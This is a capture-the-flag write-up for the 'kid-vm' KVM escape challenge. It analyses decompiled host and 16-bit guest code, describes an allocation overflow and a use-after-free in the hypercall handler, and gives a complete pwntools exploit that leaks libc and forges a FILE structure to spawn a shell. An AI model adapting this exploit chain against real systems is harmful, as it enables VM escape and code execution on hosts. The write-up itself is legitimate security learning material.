Tags: use-after-free ida vm arbitrary-code-execution
Rating:
**Description**
> Writing a vm is the best way to teach kids to learn vm escape.
>
> nc 34.236.229.208 9999
**Files provided**
- [kid-vm.zip](https://s3-us-west-1.amazonaws.com/realworldctf/kid_vm_801180ca894848965a2d6424472e0acb.zip)
**Solution**
A VM escape challenge. A VM is implemented using hypervisor `/dev/kvm`. We need to escape the VM and get RCE.
The program can't be run in VM ubuntu, since there is no `/dev/kvm`.
Initially, I was trying to figure out what each `ioctl` does; however, this is not useful. What we need to do is to look at how VM handles special instruction such as `in/out/vmcall` and what the guest OS does.
here is the code to handle `in` and `out`
```c
case 2u:
if ( *((_BYTE *)p_vcpu + 32) == 1
&& *((_BYTE *)p_vcpu + 33) == 1
&& *((_WORD *)p_vcpu + 17) == 0x17
&& *((_DWORD *)p_vcpu + 9) == 1 )
{
putchar(*((char *)p_vcpu + p_vcpu[5]));// out to print to stdout
continue;
}
if ( !*((_BYTE *)p_vcpu + 32)
&& *((_BYTE *)p_vcpu + 33) == 1
&& *((_WORD *)p_vcpu + 17) == 23
&& *((_DWORD *)p_vcpu + 9) == 1 )
{
read(0, (char *)p_vcpu + p_vcpu[5], 1uLL);// in to get input from stdin
continue;
}
fwrite("Unhandled IO\n", 1uLL, 0xDuLL, stderr);
return 1LL;
```
and here is the code to handle, where we do memory operation on host machine
```c
if ( vm_codes[*(_QWORD *)®s[128]] == 0xF
&& vm_codes[*(_QWORD *)®s[128] + 1] == 1
&& vm_codes[*(_QWORD *)®s[128] + 2] == 0xC1u )
{//0f 01 c1 is the byte code of vmcall
if ( ioctl(fd_vcpu, 0x8090AE81uLL, regs) == -1 )
puts("Error get regs!");
switch ( *(unsigned __int16 *)regs )
{
case 0x101u:
free_host(*(__int16 *)®s[8], *(unsigned __int16 *)®s[16]);
break;
case 0x102u:
update_host(
*(__int16 *)®s[8],
*(unsigned __int16 *)®s[16],
*(unsigned __int16 *)®s[24],
(__int64)vm_codes);
break;
case 0x100u:
alloc_host(*(unsigned __int16 *)®s[8]);
break;
default:
puts("Function error!");
break;
}
}
```
Some of the constants of `ioctl` can't be found in IDA, I don't know why. In addition, the online resources are rare and unclear, so the relevant data structures and macros are hard to identify, and I wasted much time on looking for what each `ioctl` does. Luckily, this is not so important to solve this challenge.
### guest OS arbitrary code execution
The guest OS memory is set here
```c
v13 = 0LL;
v14 = 0LL;
v15 = 0x10000LL;
v16 = vm_codes;
//vm_codes comes from data from 0x18E0
if ( ioctl(fd_vm, 0x4020AE46uLL, &v13) == -1 )// AE46 KVM_SET_USER_MEMORY_REGION
{
perror("Fail");
return 1LL;
}
```
dump the 896 bytes of data at 0x18e0 and add some 0 to make binary file page aligned(because the program uses memory after 896 as global variables), analyze using 16 bits real-mode assembly. The reason is when a CPU starts, the mode is initially 16 bits real mode.
And this is quite clear, the host memory allocation is implemented using `vmcall`; input and output are also implemented using `in` and `out`. They are all handled by the VM program when these instruction are being executed.
Normal memory allocation starts at 0x5000
```assembly
89 CF mov di, cx ; actual allocation
81 C1 00 50 add cx, 5000h
01 F6 add si, si
89 8C 46 03 mov ds:mems[si], cx
89 84 66 03 mov ds:sizes[si], ax
01 C7 add di, ax
89 3E 44 03 mov ds:next_alloc, di
A0 42 03 mov al, ds:num_of_mem
FE C0 inc al
A2 42 03 mov ds:num_of_mem, al
EB 1F jmp short loc_E1
;codes from alloc_6f
```
The size limitation for each chunk is 0x1000
```assembly
A1 40 03 mov ax, ds:alloc_size
3D 00 10 cmp ax, 1000h
77 33 ja short loc_C2
```
The max bound is 0xb000
```assembly
8B 0E 44 03 mov cx, ds:next_alloc
81 F9 00 B0 cmp cx, 0B000h
77 34 ja short loc_CD
```
However, this is problematic, if we alloc `0xb000 + 0x5000 = 0x10000`, which becomes `0x0000` due to overflow, and the codes of program is here! So we can write to codes and get arbitrary code execution.
PS: in 16 bits real mode, there is no such thing as RWX attribute of pages.
To test our idea, we can write `0x0000-0x1000` to `hlt` or `int3`, and it is clear that the reaction is different.
### VM escape
in free host, there is a UAF
```c
void __fastcall free_host(__int16 a1, unsigned __int16 a2)
{
if ( a2 <= 0x10u )
{
switch ( a1 )
{
case 2:
free((void *)buf[a2]);
buf[a2] = 0LL;
--dword_20304C;
break;
case 3:
free((void *)buf[a2]);
buf[a2] = 0LL;
sizes[a2] = 0;
--dword_20304C;
break;
case 1:
free((void *)buf[a2]); // UAF & double free
break;
}
}
else
{
perror("Index out of bound!");
}
}
```
However, this will not be executed if we don't have arbitrary code execution in guest OS, since only case 3 will be called by vmcall in guest OS.
```assembly
68 00 01 push 100h
9D popf
B8 01 01 mov ax, 101h
BB 03 00 mov bx, 3
8A 0E 43 03 mov cl, ds:idx
0F 01 C1 vmcall
```
also, in update, there is an operation for us to leak libc, case 2
```c
void __fastcall update_host(__int16 a1, unsigned __int16 a2, unsigned __int16 a3, __int64 a4)
{
if ( a2 <= 0x10u )
{
if ( buf[a2] )
{
if ( (unsigned int)a3 <= sizes[a2] )
{
if ( a1 == 1 )
{
memcpy((void *)buf[a2], (const void *)(a4 + 0x4000), a3);
}
else if ( a1 == 2 )
{
memcpy((void *)(a4 + 0x4000), buf[a2], a3);
}
}
//....
```
Similarly, this will not be called unless we get arbitrary code execution in guest OS.
Therefore, the vuln is UAF with `0x80 <= size <= 0x1000`, we can use house of orange to exploit it.
The way to exploit is not hard, just regard it as a normal pwn, I will not explain this in detail.
The exploit is
```python
from pwn import *
g_local=False
e=ELF('./libc-2.23.so')
context.log_level='debug'
UPDATE_RET_ADDR = 0x122
LAST_ALLOC_SIZE = 0x1F3
IO_STR_FINISH = 0x3c37b0
UNSORT_OFF = 0x7f603f138b78 - 0x7f603ed74000
if g_local:
sh = process('./kidvm')#, env={'LD_PRELOAD':'./libc-2.23.so'})
#gdb.attach(sh)
else:
sh = remote("34.236.229.208", 9999)
def alloc(size):
sh.send("1")
sh.recvuntil("Size:")
sh.send(p16(size))
sh.recvuntil("Your choice:")
def update(idx, content):
sh.send("2")
sh.recvuntil("Index:")
sh.send(chr(idx))
sh.recvuntil("Content:")
sh.send(content)
#sh.recvuntil("Your choice:")
def alloc_host(size):
push_0x100_popf = "\x68\x00\x01\x9D"
# forgot this initially, stuck for 1 hours :(
mov_ax = "\xB8" + p16(0x100)
mov_bx = "\xBB" + p16(size)
vmcall = "\x0f\x01\xc1"
return push_0x100_popf + mov_bx + mov_ax + vmcall
def update_host(size, idx, bx):
push_0x100_popf = "\x68\x00\x01\x9D"
mov_ax = "\xB8" + p16(0x102)
mov_bx = "\xBB" + p16(bx)
mov_cx = "\xB9" + p16(idx)
mov_dx = "\xBA" + p16(size)
vmcall = "\x0f\x01\xc1"
return push_0x100_popf + mov_ax + mov_bx + mov_cx + mov_dx + vmcall
def free_host(idx):
push_0x100_popf = "\x68\x00\x01\x9D"
mov_ax = "\xB8" + p16(0x101)
mov_bx = "\xBB" + p16(1) # 1 will cause UAF
mov_cx = "\xB9" + p16(idx)
vmcall = "\x0f\x01\xc1"
return push_0x100_popf + mov_ax + mov_bx + mov_cx + vmcall
def write_stdout(addr, size, ip):
mov_ax = "\xB8" + p16(addr)
mov_bx = "\xBB" + p16(size)
call = "\xE8" + p16(0x1f3 - (ip + len(mov_ax + mov_bx) + 3))
return mov_ax + mov_bx + call
def read_stdin(addr, size, ip):
mov_ax = "\xB8" + p16(addr)
mov_bx = "\xBB" + p16(size)
call = "\xE8" + p16(0x205 - (ip + len(mov_ax + mov_bx) + 3))
return mov_ax + mov_bx + call
sh.recvuntil("Your choice:")
for i in xrange(0,0xb):
alloc(0x1000)
alloc(LAST_ALLOC_SIZE)
#now edit 0xb to write code segment of guest OS
shellcode = alloc_host(0x80) #0
shellcode += alloc_host(0x80) #1
shellcode += free_host(0)
shellcode += update_host(8, 0, 2)
shellcode += write_stdout(0x4000, 8, len(shellcode) + UPDATE_RET_ADDR)
shellcode += free_host(1) #consolidate
shellcode += alloc_host(0x90) #2
shellcode += alloc_host(0x200) #3 edit 1 to edit this chunk header
rec = len(shellcode)
shellcode += alloc_host(0x80) #4 prevent consolidate
shellcode += free_host(3)
shellcode += read_stdin(0x4000, 0x10, len(shellcode) + UPDATE_RET_ADDR)
shellcode += update_host(0x10, 1, 1)
shellcode += read_stdin(0x4000, 0xE0, len(shellcode) + UPDATE_RET_ADDR)
shellcode += update_host(0xE0, 3, 1)
#shellcode += alloc_host(10)
shellcode += "\xEB" + chr((rec - (len(shellcode) + 2)) & 0xFF)
payload = "\xcc" * UPDATE_RET_ADDR
payload += shellcode
assert len(payload) < LAST_ALLOC_SIZE
payload += (LAST_ALLOC_SIZE - len(payload)) * "\x90"
update(0xb, payload)
libc_addr = u64(sh.recvuntil("\x00\x00")) - UNSORT_OFF
print hex(libc_addr)
fake_file = p64(0)
fake_file += p64(0x61)
fake_file += p64(libc_addr + UNSORT_OFF)
fake_file += p64(libc_addr + e.symbols["_IO_list_all"] - 0x10)
fake_file += p64(2) + p64(3)
fake_file += "\x00" * 8
fake_file += p64(libc_addr + next(e.search('/bin/sh\x00'))) #/bin/sh addr
fake_file += (0xc0-0x40) * "\x00"
fake_file += p32(0) #mode
fake_file += (0xd8-0xc4) * "\x00"
fake_file += p64(libc_addr + IO_STR_FINISH - 0x18) #vtable_addr
fake_file += (0xe8-0xe0) * "\x00"
fake_file += p64(libc_addr + e.symbols["system"])
sh.send(fake_file[0:0x10])
assert len(fake_file[0x10:]) == 0xE0
sh.send(fake_file[0x10:])
sh.interactive()
```
PS: It seems that `asm` in pwntools does not work for 16 bits assembly
- [mem2019](https://github.com/mem2019)
> It seems that asm in pwntools does not work for 16 bits assembly
It worked for me. I prefixed assembly with ".code16" directive.